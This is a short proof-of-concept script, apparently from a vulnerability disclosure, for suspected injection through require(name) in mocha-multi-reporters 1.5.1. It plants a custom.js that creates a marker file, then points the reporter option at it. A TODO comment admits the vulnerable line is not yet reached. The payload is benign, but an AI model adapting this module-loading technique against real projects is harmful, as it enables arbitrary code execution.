Package mocha-multi-reporters: potential injection through 'require(name)' in src/lib/MultiReporters.js

mocha-multi-reporters-1.5.1_poc.js

'use strict'

const fs = require('node:fs');
const path = require('node:path');

/*
 * Create a local 'custom.js' file so that the program flow can
 * continue within the call below.
 */
const filename = path.join(process.cwd(), 'custom.js');
try {
    if ( ! fs.existsSync(filename)) {
        const custom_js_code = 
        `const main = function() {
    const fs = require('node:fs');
    const path = require('node:path');

    const exploitName = 'exploited.txt';
    const exploitedPath = path.join(process.cwd(), exploitName);
    let fd = fs.openSync(exploitName, 'w');
    fs.closeSync(fd); 
}

main();`;

        let fd = fs.openSync(filename, 'w');
        console.log("[INFO] - Created: " + filename);
        fs.writeSync(fd, custom_js_code);
        console.log(`[INFO] - Wrote to ${filename}:\n${custom_js_code}`);
        fs.closeSync(fd); 
        console.log("[INFO] - Closed: " + filename);

        
    }
} catch(err) {
    console.error(`[ERROR] - message:\n${err}`);
}

const pkg = require('mocha-multi-reporters');

const runner = {
    stats: {},
    on: function (str_const, cb) {  },
    once: function (str_const, cb) {  },
};
const options = {
    execute: true,
    enabledReporters: ['custom.js']
};

/* 
 * TODO: find a way to reach line #75 of src/lib/MultiReporters.js
 * so that the call require(name) becomes require('custom.js').
 */
const instance = new pkg(runner, options);